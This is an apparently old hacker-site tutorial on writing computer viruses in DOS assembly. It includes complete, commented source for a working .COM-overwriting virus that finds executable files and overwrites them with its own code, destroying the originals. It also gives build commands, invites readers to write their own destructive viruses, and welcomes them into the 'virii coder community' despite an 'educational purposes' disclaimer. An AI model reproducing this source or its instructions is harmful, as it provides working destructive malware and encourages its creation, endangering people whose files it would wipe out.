Virus Creation - De la création des virus Ombrae bjdc@canl.nc virus, virii, virus toolkit, creation, virii creation, viruses, worms [Editor's Note: The content here-in is strictly for educational purposes. Please do not use the information outlined in this article to harm anything or anyone. If you choose to do so, please keep in mind that the results are your fault, and hence is not the fault of the author of this article, black.box.sk staff, *.box.sk staff, or the *.box.sk network] [Edited for easier reading, by BinaryZer0@box.sk] I'm not English, so [sorry about grammar errors, etc] "De la création des virus" When I got my first computer, people always said [to] me "..and don't forget to buy a good AV!" [At] this time, I didn't know what a computer virus [was]. So when I had my first one (keypress), I just made a hard format of my HD. Indeed this was a good solution, as the virus was really wiped out, but all [of] my data [as well]! Next time, I used a good AV, [that doesn't] destroy my HD, but only the infected files (all the *.com in /windows and /dos), so I was really happy. So, when I got access to the web, one of the first things I searched was good texts on virii. First problem: There was a word I didn't understand: ASM. So, I search it into my french/english dictionary (I'm french, which was the second problem), and found nothing. I'm not stupid, so, I made a basic astalavista search (http://astalavista.box.sk, a good security related search engine), and so I found Asm = Assembler. I found a tutorial, learned basic asm (mov ah, 09h lea dx, stupid int 21h....) and now I know how to make some of these nice little things that can bring you so much fun in a bored life... :) So what is asm??? Asm stands for assembler, which is the most powerful and basic computer langage... it is an older computer langage, the ONE [that] can give you all (and more of) the power you need to create a virus. It is possible to make virii in other languages, such as C, but it's not really 'elite', nor good, as high level languages generate [more] code than low level langages (like Asm). There are several different asm's, one per processor, so u can see ASM SPARC, MIPS, 80x86, 80x87, etc. If you use a PC, you must learn ASM 80x86. You can tell me that you don't have a 80x86, but a big PIII. Yes, but your PIII uses the 80x86 instruction set, plus other instructions specific to pIII of course! (+ PII instructions, and Pentium, and 486, and 386 and 286... :) So when you write in assembly on PC, you use asm80x86... (PS: asm 80x87 = math coprocessor asm). So, if you want to learn how to create a virus, you must learn Asm, and if you want to learn Asm, it's always good to have a pattern to copy, like a virus. :) You need a compiler and a linker too. A compiler is a program used to generate [a] program. I suggest [using] MASM or TASM (respectivly, Microsoft Asm and Turbo Asm) for the compiler, [which] you can find on the net. There are other compilers too (A86, NASM...), but I never used these. For the linker, use tlink (always with TASM) or link, which was a basic program that came with DOS (look in your old DOS version...) or in almost all compiler (I first used the symantec C linker). Now, the big part: Basic Asm for beginner. There are lots of texts and tutorials, find as many as you can. Read it, smell it, learn it.... until you know the following: mov ah, 09h lea dx, phrase int 21h xor ah, ah int 21h then you know the very basic asm... Don't try to learn all the interrupt... Find HelpPC, this is a very good help for coder. Now the virus. This one is a very basic virus, a com-overwriting virus. It finds all the *.com files, then replace them with its own code. (the original code is destroyed). ; lots of coders use .TINY ; .CODE ; I prefer this one... which works all compilers _______________________________________________________________ code segment ; declaration of a segment named 'code' assume cs:code, ds:code ; make cs=ds=@ of code ; cs = code segment, ds = data segment ; in a com file, we use the same segment for both the data and the code org 100h ; for the com too (the code start at offset 100h, after the PSP) ; h stands for hexadecimal start: mov ah, 4eh ; 4eh => DOS finds first file function lea dx, mot ; search file *.com xor cx, cx ; xor cx, cx = mov cx, 0 (always use xor, not mov ,0) int 21h ; interrupt 21h (DOS interrupt) ouverture: mov dx, 0e9h ; the 4eh function place the name found in the DTA, which is a important ; part of the PSP... The name is at offset 0e9h mov ah, 3dh ; DOS open file function mov al, 01h ; open for write (PS: better to use mov ax, 3d01h) int 21h jc error ; if there is an error,goto error xchg ax, bx ; exchange ax and bx... so bx is the handle of the file (faster then mov bx, ax) mov ah, 40h ; DOS write file function mov cx, (offset finp - offset start) ; number of bits to write (= fin - start) mov dx, 100h ; we write our own code, so we start at 100h int 21h jc error ; error? => goto error mov ah, 09h ; DOS print to screen mov dx, offset adi ; dx = offset of adi (= lea dx, adi) int 21h jmp fin ; goto fin error: mov ah, 09h lea dx, erre ; = mov dx, offset erre int 21h fin: int 20h ; old DOS interrupt... = mov ah, 4ch int 21h (quit prog) adi db "Finish!$" ; our data erre db "There is an error$" mot db "*.com" finp label near ; a label to know where finish the virus code ends end start ______________________________________________________________________ compile with tasm (or masm) name.asm tlink /t name (or link name exe2bin name.exe name.com) Well, this is not a very good virus. It destroys the file, has poor code inside, the error part is useless, as the adi part, and the *.com file isn't so used as before.... but this is an operational virus.... :) PS: any AV can detect this one.... Now the important part: how [does] it work??? com files are old dos programs that have a special structure.... When you use a com file, dos chooses a segment (a segment is a 64KB portion of memory), then creates a PSP where it loads some info, and then places the code at offset 100h (the PSP is 256b long, 256d=100h, always think hexadecimal). The program in memory is the same as the one on HD. At offset 80h of the PSP sets the DTA, which contains info on the file (lenght, date, time (of creation), name). After a succefull use of the find file function, the DTA is set with the info of the file find. The name is at offset eh of the DTA, so 80h+1eh = 9eh. This is the only part of this type of virus. Now create your own overwriting virus, and try to make it smaller. A smaller virus is often a faster virus. Compile them many times in testing some optimization, and learn what works fine. Next time, the subject will be more difficult => com appender virus, this type of virus doesn't destroy the original program. To test: try to use some DOS function like: _del file _creat/destroy a directory _change of directory _get a string _get a string, then try to look if this is a file _get a string, then destroy the file or the directory if exist This doesn't serve as a virus, but can be useful as exercize.... Use j.. jump for conditionnal loop... (I'll give you some example program next time) Welcome to the virii coder community, Good luck,